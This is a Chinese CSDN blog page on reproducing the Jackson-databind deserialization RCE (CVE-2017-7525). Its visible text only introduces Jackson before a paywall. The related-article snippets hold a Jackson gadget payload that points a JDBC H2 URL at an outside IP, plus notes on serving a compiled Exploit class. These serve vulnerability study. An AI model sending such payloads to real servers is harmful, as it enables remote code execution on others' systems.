Jackson 反序列化远程代码执行漏洞复现

最新推荐文章于 2024-06-27 22:49:26 发布
最新推荐文章于 2024-06-27 22:49:26 发布
阅读量2.2k 收藏 1
点赞数
文章标签: java json 编程语言 spring kubernetes
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuteer_xu/article/details/107572841
版权
本文介绍了Jackson框架,特别是其序列化和反序列化功能,以及如何在特定配置下可能导致代码执行的安全风险。讨论了Jackson与Fastjson的区别,并详细讲解了CVE-2017-7525漏洞,该漏洞通过构造恶意JSON数据利用Jackson的SetterlessProperty特性触发命令执行。防御措施包括升级JDK版本。此外,文章还提及了学习资源和社区交流途径。
摘要由CSDN通过智能技术生成

本文作者:light(Ms08067实验室 SRSP TEAM小组成员)


jackson介绍

Jackson是一个能够将java对象序列化为JSON字符串,也能够将JSON字符串反序列化为java对象的框架。是基于Java平台的一套数据处理工具,被称为”最好的Java Json解析器”。它可以使我们高效、简便的处理json字符串。

序列化

序列化函数为databind.ObjectMapper。

当Jackson开启某些配置时,会允许开发者在反序列化时指定要还原的类,过程中调用其构造方法setter方法或某些特殊的getter方法,当这些方法中存在一些危险操作时就造成了代码执行。

Jackson核心模块组成

jackson-core核心包用于提供基于"流模式"解析的相关API,它包括 JsonPaser和JsonGenerator。Jackson内部实现正是通过高性能的流模式 API的JsonGenerator和JsonParser来生成和解析json。<

最低0.47元/天 解锁文章
Ms08067安全实验室
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jackson反序列化远程代码执行漏洞(CVE-2020-24616)复现
玄道的网安博客
04-26 2721
简介 FasterXML Jackson是美国FasterXML公司的一款适用于Java的数据处理工具。jackson-databind是其中的一个具有数据绑定功能的组件。 影响版本 jackson-databind < 2.9.10.6 环境搭建 搭建一个Java项目,新建一个Poc类,下载并导入存在漏洞的包 导入存在漏洞的包 exp文件 编译并启动环境 javac Exploit.java py -3 -m http.server 88...
jackson框架java反序列化漏洞_Jackson CVE-2019-12384: 反序列化漏洞复现
weixin_39830200的博客
02-23 418
文章参考:https://blog.doyensec.com/2019/07/22/jackson-gadgets.html环境搭建引入jar包:ssrf payload:"[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:tcp://139.196.103.119:9999/test\"}]...
网络安全筑基篇——反序列化漏洞
weixin_55762309的博客
06-27 1284
反序列化漏洞原理详解
Jackson-databind 反序列化漏洞复现(CVE-2017-7525)
whojoe的博客
05-26 3276
Jackson-databind 反序列化漏洞复现(CVE-2017-7525)环境搭建启动docker下载环境生成docker环境漏洞检测区分 FastjsonJackson漏洞复现小结参考文章 环境搭建 启动docker systemctl start docker 下载环境 git clone https://github.com/vulhub/vulhub.git 也可以使用码云上个人维护的镜像 git clone https://gitee.com/fahawifi/vulhub.git
Jackson-databind 反序列化漏洞(CVE-2017-7525)复现
HEAVEN569的博客
03-12 1956
1.漏洞出现的原因 Jackson-databind 支持 Polymorphic Deserialization 特性(默认情况下不开启),当json字符串转换的Target class中有polymorph fields,即字段类型为接口、抽象或Object类型时,攻击者可以通过在json字符串中指定变量的具体类型(子类或者接口实现类,)来实现实例化指定的类,借助某些特殊的class,如TemplatesImpl,可以实现任意代码执行。 所以本漏洞利用条件如下 1.开启JacksonPo..
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。阿里云应急响应中心提醒Jackson用户尽快采取安全措施阻止漏洞攻击。
jackson json序列化,反序列化所需jar包
12-08
`jackson-databind-2.2.3.jar` 包含了`ObjectMapper`类,它是Jackson库中最常用的类,负责执行序列化和反序列化操作。 2. **jackson-core**:这个模块是Jackson的基础,包含了JSON解析和生成的基本功能。`jackson-...
SpringBoot2.0整合jackson配置日期格式化和反序列化的实现
08-26
"SpringBoot2.0整合jackson配置日期格式化和反序列化的实现" SpringBoot2.0整合jackson配置日期格式化和反序列化的实现是指在SpringBoot2.0项目中整合jackson库来实现日期格式化和反序列化的功能。日期格式化是指...
使用fasterxml.jackson反序列化json
01-20
反序列化是将JSON字符串转换为Java对象的过程,这使得我们可以在Java代码中直接操作这些对象,而不必直接处理字符串。 在描述中提到的问题是,当我们尝试将JSON字符串反序列化Java的List对象集合时,如果没有指定...
SpringBoot实现子类的反序列化示例代码
08-25
本文主要介绍了SpringBoot实现子类的反序列化的相关知识点,通过示例代码详细介绍了如何使用Jackson实现子类的反序列化。下面是相关知识点的总结: 1. SpringBoot中使用Jackson实现反序列化SpringBoot中,我们...
Jackson优雅序列化Java枚举类过程解析
09-07
通过定义通用的枚举接口和自定义Jackson序列化器,我们可以确保枚举类在序列化时不仅包含枚举名称,还包含了与其相关联的代码和描述。这种方法提高了JSON数据的可读性和实用性,同时也为其他枚举类提供了统一的序列...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool(又名嵌入 org.glassfish 中的 Xalan)相关的序列化小工具和类型之间的交互。 web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http:
利用Vulnhub复现漏洞 - Jackson-databind 反序列化漏洞(CVE-2017-7525)
JiangBuLiu的博客
07-10 8287
Jackson-databind 反序列化漏洞(CVE-2017-7525)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置CVE-2017-7525CVE-2017-17485 Vulnhub官方复现教程 https://vulhub.org/#/environments/jackson/CVE-2017-7525/ 漏洞原理 Jackson-da...
jackson CVE-2017-7525 漏洞复现
Shanfenglan's blog
11-29 1654
CVE-2017-7525 Jackson-databind 反序列化漏洞 原理 Jackson-databind 在设置 Target class 成员变量参数值时,若没有对应的 getter 方法,则会使用 SetterlessProperty 调用 getter 方法,获取变量,然后设置变量值。当调用 getOutputProperties() 方法时,会初始化 transletBytecodes 包含字节码的类,导致命令执行,具体可参考 java-deserialization-jdk7u21-ga
CVE-2019-12384 jackson ssrf-rce漏洞复现
ZJT6666666的博客
12-28 759
CVE-2019-12384 jackson ssrf-rce漏洞复现
Jackson CVE-2017-7525 反序列化漏洞
王嘟嘟的博客
03-01 878
Jackson 相对应fastjson来说利用方面要求更加苛刻,默认情况下无法进行利用。
vulhub漏洞复现29_Jackson
weixin_44193247的博客
02-03 1021
vulhub漏洞复现练习篇
(环境搭建+复现)CVE-2019-12384 Jackson 远程代码执行漏洞
daxi0ng的博客
03-30 4250
1、【CVE编号】 CVE-2019-12384 2、【漏洞名称】 Jackson 远程命令执行漏洞 3、【靶标分类】 Web类型类靶标 4、【影响版本】 Jackson-databind 2.X < 2.9.9.1 5、【漏洞分类】 代码执行 6、【漏洞等级】 高 7、【漏洞简介】 由于Jackson黑名单过滤不完整而导致,当开发人员在应用程序中通过ObjectMapper对象调用enab...
Jackson序列化远程代码执行漏洞修复
Delphinidae
03-05 4358
安全参考链接:https://mp.weixin.qq.com/s/gHnSfsMuLLlk7lQ4f5Nkdw 漏洞影响:JNDI注入导致远程代码执行 CVE编号:暂时没发布,(fastjson的cve是CVE-2020-8840) 解决方案:1 升级jackson-databind >= 2.10.0 2 项目代码中剔除使用enableDefaultTyping类的使用,用官方给出的类替...
Jackson的序列化与反序列化简单代码
最新发布
08-10
Jackson是一个流行的Java库,用于处理JSON数据的转换,包括从JSONJava对象(序列化)以及反之(反序列化)。以下是使用Jackson库进行序列化和反序列化的简单示例: ```java // 导入所需的Jackson库 import ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值